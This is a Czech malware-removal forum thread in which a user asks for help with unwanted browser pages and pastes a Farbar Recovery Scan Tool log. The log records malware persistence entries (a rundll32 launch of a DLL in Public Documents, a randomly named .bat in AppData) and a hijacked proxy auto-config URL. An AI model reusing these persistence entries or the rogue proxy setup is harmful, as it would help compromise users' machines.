Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz

Otevírání nevyžádaných stránek v prohlížeči

Máte problém s virem? Vložte sem log z FRST nebo RSIT.

Moderátor: Moderátoři

Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]

Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.

!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Zamčeno
Zpráva
Autor
veny
Návštěvník
Návštěvník
Příspěvky: 25
Registrován: 27 srp 2006 21:27

Otevírání nevyžádaných stránek v prohlížeči

#1 Příspěvek od veny »

Dobrý den
AdwCleaner-spuštěn dvakrát, proto v příloze dva logy.
Plus log z FRST.
Prosím o preventivní kontrolu logů, protože to vypadá že po očistě s AdwCleanerem je to zatím v pořádku.
Přílohy
AdwCleaner.zip
(3.27 KiB) Staženo 94 x
Naposledy upravil(a) veny dne 03 lis 2017 12:48, celkem upraveno 1 x.
Nahoru
veny
Návštěvník
Návštěvník
Příspěvky: 25
Registrován: 27 srp 2006 21:27

Re: Otevírání nevyžádaných oken v prohlížeči

#2 Příspěvek od veny »

FRST log
Přílohy
FRST.zip
(11.79 KiB) Staženo 82 x
Nahoru
veny
Návštěvník
Návštěvník
Příspěvky: 25
Registrován: 27 srp 2006 21:27

Re: Otevírání nevyžádaných oken v prohlížeči

#3 Příspěvek od veny »

FRST Addition log

přílohy nešly vložit do jednoho příspěvku

Děkuji V.
Přílohy
Addition.zip
(16.62 KiB) Staženo 82 x
Nahoru
veny
Návštěvník
Návštěvník
Příspěvky: 25
Registrován: 27 srp 2006 21:27

Re: Otevírání nevyžádaných oken v prohlížeči

#4 Příspěvek od veny »

jelikož problém stále přetrvává přikládám nový log z FRST
Děkuji

Kód: Vybrat vše

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 26-10-2017
Ran by CAM (administrator) on CAM-PC (01-11-2017 07:36:11)
Running from C:\Users\CAM\Desktop
Loaded Profiles: CAM & ReportServer$HORRY & MSSQLFDLauncher$HORRY & MSSQL$HORRY & ReportServer & MSSQLFDLauncher & MSSQLSERVER (Available Profiles: CAM & postgres & vaclav & ReportServer$HORRY & MSSQLFDLauncher$HORRY & MSSQL$HORRY & ReportServer & MSSQLFDLauncher & MSSQLSERVER & Classic .NET AppPool & DefaultAppPool)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: Čeština (Česká republika)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Windows\System32\nvwmi64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvwmi64.exe
(Microsoft Corporation) C:\Windows\System32\inetsrv\inetinfo.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.HELIOS\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL12.HORRY\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSRS12.MSSQLSERVER\Reporting Services\ReportServer\bin\ReportingServicesService.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSRS12.HORRY\Reporting Services\ReportServer\bin\ReportingServicesService.exe
(SafeNet, Inc.) C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe
(SafeNet, Inc) C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe
(SafeNet, Inc.) C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Security Runtime\sntlsrtsrvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\fdhost.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL12.HORRY\MSSQL\Binn\fdlauncher.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL12.HORRY\MSSQL\Binn\fdhost.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Disc Soft Ltd) C:\Program Files (x86)\DAEMON Tools Lite\DiscSoftBusServiceLite.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(forum.viry.cz) C:\Users\CAM\Desktop\FRSTLauncher.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [MSC] => C:\Program Files\Microsoft Security Client\msseces.exe [1353680 2016-11-14] (Microsoft Corporation)
HKLM-x32\...\Run: [ISUSScheduler] => C:\Program Files (x86)\Common Files\InstallShield\UpdateService\issch.exe [81920 2005-02-17] (InstallShield Software Corporation)
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\Run: [ISUSPM Startup] => c:\Program Files (x86)\Common Files\InstallShield\UpdateService\ISUSPM.exe [221184 2005-02-17] (InstallShield Software Corporation)
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files (x86)\DAEMON Tools Lite\DTAgent.exe [4701888 2017-02-07] (Disc Soft Ltd)
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\Run: [*yyixt<*>] => "C:\Users\CAM\AppData\Local\a5d330da\91eaeea4.bat" <==== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\Run: [Documents index service] => C:\Windows\system32\rundll32.exe "C:\Users\Public\Documents\DocumentsIndex.dll",Run
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\Policies\Explorer: [] 
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\MountPoints2: {658228cd-f130-11e3-b477-806e6f6e6963} - E:\ppk.exe
HKU\S-1-5-80-2885764129-887777008-271615777-1616004480-2722851051\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516096 2010-11-21] (Microsoft Corporation)
HKU\S-1-5-80-3263513310-3392720605-1798839546-683002060-3227631582\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516096 2010-11-21] (Microsoft Corporation)
HKU\S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516096 2010-11-21] (Microsoft Corporation)
GroupPolicy: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

AutoConfigURL: [S-1-5-21-834650113-1102577966-3259890034-1000] => hxxp://web-quick-access.com/wpad.dat?b4dfed9846cc3cf5ff885fa5efcbf18f36423907
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.130.1
Tcpip\..\Interfaces\{4398B7F7-ED98-4D06-9E1D-977DF65502DC}: [DhcpNameServer] 192.168.130.1
ManualProxies: 0hxxp://web-quick-access.com/wpad.dat?b4dfed9846cc3cf5ff885fa5efcbf18f36423907

Internet Explorer:
==================
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.cz/
SearchScopes: HKU\S-1-5-21-834650113-1102577966-3259890034-1000 -> DefaultScope {30E41A7F-5CC8-474D-86D8-8021572B7DF3} URL = hxxps://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-834650113-1102577966-3259890034-1000 -> {30E41A7F-5CC8-474D-86D8-8021572B7DF3} URL = hxxps://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-834650113-1102577966-3259890034-1000 -> {BF349553-1CF0-4DDC-B940-AACA54DF1D91} URL = hxxp://tv.seznam.cz/hledej?w={searchTerms}&sourceid=QuickSearch_12454
BHO: GBHO.BHO -> {45d30484-7ded-43d9-957a-d2fd1f046511} -> C:\Windows\system32\mscoree.dll [2010-11-21] (Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_121\bin\ssv.dll [2017-02-03] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2017-03-29] (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-02-03] (Oracle Corporation)
BHO-x32: Pomocná služba pro přihlášení k účtu Microsoft -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2017-03-29] (Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation)
BHO-x32: Microsoft Web Test Recorder 14.0 Helper -> {b924f0b4-0b3c-49c0-bab2-213fb9ebd1d3} -> C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO100.dll [2015-07-06] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2017-07-11] (Microsoft Corporation)
Toolbar: HKLM - Smart Recovery 2 - {1d09c093-f71e-43c3-b948-19316cbd695e} - C:\Windows\system32\mscoree.dll [2010-11-21] (Microsoft Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2017-03-29] (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2017-03-29] (Google Inc.)
DPF: HKLM-x32 {A8F2B9BD-A6A0-486A-9744-18920D898429} hxxp://www.sibelius.com/download/software/win/ActiveXPlugin.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} -  No File
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} -  No File
Handler: mso-minsb-roaming.16 - No CLSID Value
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2017-08-15] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2017-08-15] (Microsoft Corporation)
Handler: osf-roaming.16 - No CLSID Value
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2017-08-15] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2017-08-15] (Microsoft Corporation)

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll [2015-08-13] ()
FF Plugin: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-02-03] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-02-03] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~4\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll [2015-08-13] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~4\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-02-06] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-02-06] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-02] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-07-31] (Adobe Systems Inc.)

Chrome: 
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default [2017-10-31]
CHR Extension: (Prezentace Google) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-04-28]
CHR Extension: (Dokumenty Google) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-04-28]
CHR Extension: (Disk Google) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-04-28]
CHR Extension: (YouTube) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-04-28]
CHR Extension: (Vyhledávání Google) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2017-02-16]
CHR Extension: (Tabulky Google) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-04-28]
CHR Extension: (Dokumenty Google offline) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-04-28]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-04-28]
CHR Extension: (电脑管家上网防护) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooebklgpfnbcnpokahmdidgbmlcdepkm [2017-02-16]
CHR Extension: (Gmail) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-04-28]
CHR Extension: (Chrome Media Router) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-09-19]

Opera: 
=======
OPR Extension: (Translator) - C:\Users\CAM\AppData\Roaming\Opera Software\Opera Stable\Extensions\cnbpedcoekjafichoehopgaaldogogch [2017-06-07]
OPR Extension: (Pinky) - C:\Users\CAM\AppData\Roaming\Opera Software\Opera Stable\Extensions\ibgecmlomhdooncfjlaelfbbeijbccbd [2017-10-10]
OPR Extension: (Adblock Plus) - C:\Users\CAM\AppData\Roaming\Opera Software\Opera Stable\Extensions\oidhhegpmlfpoeialbgcdocjalghfpkp [2017-09-29]
StartMenuInternet: (HKLM) OperaStable - C:\Program Files (x86)\TC UP\PLUGINS\Media\Opera\launcher.exe

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2227312 2017-01-19] (Adobe Systems, Incorporated)
S3 AppleChargerSrv; C:\Windows\System32\AppleChargerSrv.exe [31272 2010-04-06] ()
R3 Disc Soft Lite Bus Service; C:\Program Files (x86)\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1471168 2017-02-07] (Disc Soft Ltd)
S3 FabricHostSvc; C:\Program Files\Microsoft Service Fabric\bin\FabricHost.exe [3495072 2017-01-13] (Microsoft)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-03] (Macrovision Corporation) [File not signed]
R2 IISADMIN; C:\Windows\system32\inetsrv\inetinfo.exe [15872 2010-11-21] (Microsoft Corporation)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S2 MSSQL$ECSQLEXPRESS; c:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.ECSQLEXPRESS\MSSQL\Binn\sqlservr.exe [43130032 2015-03-29] (Microsoft Corporation)
R2 MSSQL$HELIOS; c:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.HELIOS\MSSQL\Binn\sqlservr.exe [61913952 2010-04-03] (Microsoft Corporation)
R2 MSSQL$HORRY; C:\Program Files\Microsoft SQL Server\MSSQL12.HORRY\MSSQL\Binn\sqlservr.exe [372416 2017-07-03] (Microsoft Corporation)
R2 MSSQL$SQLEXPRESS; C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [372416 2017-07-03] (Microsoft Corporation)
R3 MSSQLFDLauncher; C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe [50880 2014-02-21] (Microsoft Corporation)
R3 MSSQLFDLauncher$HORRY; C:\Program Files\Microsoft SQL Server\MSSQL12.HORRY\MSSQL\Binn\fdlauncher.exe [50880 2014-02-21] (Microsoft Corporation)
R2 MSSQLSERVER; C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\sqlservr.exe [372416 2017-07-03] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [459832 2017-02-06] (NVIDIA Corporation)
R2 NVWMI; C:\Windows\system32\nvwmi64.exe [4167224 2017-02-07] (NVIDIA Corporation)
R2 ReportServer; C:\Program Files\Microsoft SQL Server\MSRS12.MSSQLSERVER\Reporting Services\ReportServer\bin\ReportingServicesService.exe [2536640 2016-06-18] (Microsoft Corporation)
R2 ReportServer$HORRY; C:\Program Files\Microsoft SQL Server\MSRS12.HORRY\Reporting Services\ReportServer\bin\ReportingServicesService.exe [2536640 2016-06-18] (Microsoft Corporation)
R2 SentinelKeysServer; C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe [403744 2015-06-05] (SafeNet, Inc.)
R2 SentinelProtectionServer; C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe [1259808 2015-06-03] (SafeNet, Inc)
R2 SentinelSecurityRuntime; C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Security Runtime\sntlsrtsrvr.exe [293216 2013-01-09] (SafeNet, Inc.)
S4 Siemens PLM License Server; C:\Program Files\Siemens\PLMLicenseServer\lmgrd.exe [1830736 2014-01-06] (Flexera Software LLC.)
S4 Smart TimeLock; C:\Program Files (x86)\GIGABYTE\Smart6\Timelock\TimeMgmtDaemon.exe [114688 2009-10-13] (Gigabyte Technology CO., LTD.) [File not signed]
S4 SQLAgent$ECSQLEXPRESS; c:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.ECSQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [381104 2015-03-29] (Microsoft Corporation)
S4 SQLAgent$HELIOS; c:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.HELIOS\MSSQL\Binn\SQLAGENT.EXE [428384 2010-04-03] (Microsoft Corporation)
S4 SQLAgent$HORRY; C:\Program Files\Microsoft SQL Server\MSSQL12.HORRY\MSSQL\Binn\SQLAGENT.EXE [613056 2017-07-03] (Microsoft Corporation)
S4 SQLSERVERAGENT; C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE [613056 2017-07-03] (Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10803440 2017-08-29] (TeamViewer GmbH)
S3 VSStandardCollectorService140; C:\Program Files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [108776 2016-09-06] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2016-08-16] (Microsoft Corporation)
S3 WMSVC; C:\Windows\system32\inetsrv\wmsvc.exe [10752 2009-07-14] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 AppleCharger; C:\Windows\System32\DRIVERS\AppleCharger.sys [21104 2011-01-10] ()
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2017-06-26] (Disc Soft Ltd)
S3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2017-06-26] (Disc Soft Ltd)
S3 GVTDrv64; C:\Windows\GVTDrv64.sys [30528 2014-07-02] ()
R2 KtlLogger; C:\Program Files\Microsoft Service Fabric\bin\Fabric\Fabric.Code\KtlLogger.sys [975848 2017-01-13] (Microsoft Corporation)
R2 LeasLayr; C:\Program Files\Microsoft Service Fabric\bin\Fabric\Fabric.Code\LeasLayr.sys [567784 2017-01-13] (Microsoft Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
R1 MpKsl1b40fe5b; C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{FB9A9B90-C6EA-4BB6-B54E-58557D6E1B63}\MpKsl1b40fe5b.sys [49392 2017-10-31] (Microsoft Corporation)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S4 RsFx0320; C:\Windows\System32\DRIVERS\RsFx0320.sys [250048 2016-06-18] (Microsoft Corporation)
S3 RTTEAMPT; C:\Windows\System32\DRIVERS\RtTeam620.sys [58512 2012-07-03] (Realtek Corporation)
R2 Sentinel64; C:\Windows\System32\Drivers\Sentinel64.sys [145448 2009-09-17] (SafeNet, Inc.)
R3 SNTUSB64; C:\Windows\System32\DRIVERS\SNTUSB64.SYS [63568 2012-12-11] (SafeNet, Inc.)
R1 VD_FileDisk; C:\Windows\System32\Drivers\VD_FileDisk.sys [30312 2011-01-26] (CaptainFlint Software)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-11-01 06:40 - 2017-11-01 06:40 - 000012077 _____ C:\Users\CAM\Desktop\FRST.zip
2017-11-01 06:37 - 2017-11-01 06:37 - 000017017 _____ C:\Users\CAM\Desktop\Addition.zip
2017-10-31 13:52 - 2017-11-01 07:36 - 000021845 _____ C:\Users\CAM\Desktop\FRST.txt
2017-10-31 13:52 - 2017-10-31 13:52 - 000000000 ____D C:\FRST
2017-10-31 13:42 - 2017-11-01 06:50 - 000000000 ____D C:\AdwCleaner
2017-10-31 13:40 - 2017-10-31 13:41 - 008261584 _____ (Malwarebytes) C:\Users\CAM\Desktop\adwcleaner_7.0.4.0.exe
2017-10-31 13:38 - 2017-10-31 13:38 - 000112640 _____ (forum.viry.cz) C:\Users\CAM\Desktop\FRSTLauncher.exe
2017-10-31 13:37 - 2017-10-31 13:37 - 002403328 _____ (Farbar) C:\Users\CAM\Desktop\FRST64.exe
2017-10-31 08:40 - 2017-10-31 09:53 - 000000000 ____D C:\Program Files (x86)\MagicBerry for Blackberry
2017-10-31 08:40 - 2010-02-16 15:22 - 000155984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comdlg32.ocx
2017-10-31 08:40 - 2004-03-09 00:00 - 001081616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscomctl.ocx
2017-10-23 05:13 - 2017-10-23 05:14 - 000000000 ___HD C:\$WINDOWS.~BT
2017-10-20 09:15 - 2017-10-21 00:12 - 000000000 ____D C:\ESD
2017-10-20 09:12 - 2017-10-20 09:12 - 000000000 ___HD C:\$Windows.~WS
2017-10-10 20:23 - 2017-09-13 16:33 - 000631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2017-10-10 20:23 - 2017-09-13 16:32 - 005547752 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-10-10 20:23 - 2017-09-13 16:32 - 000706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2017-10-10 20:23 - 2017-09-13 16:32 - 000154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2017-10-10 20:23 - 2017-09-13 16:32 - 000095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2017-10-10 20:23 - 2017-09-13 16:31 - 001732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 001212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 001068544 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000886272 _____ (Microsoft Corporation) C:\Windows\system32\wlansvc.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000448512 _____ (Microsoft Corporation) C:\Windows\system32\wlansec.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000414208 _____ (Microsoft Corporation) C:\Windows\system32\wlanmsm.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
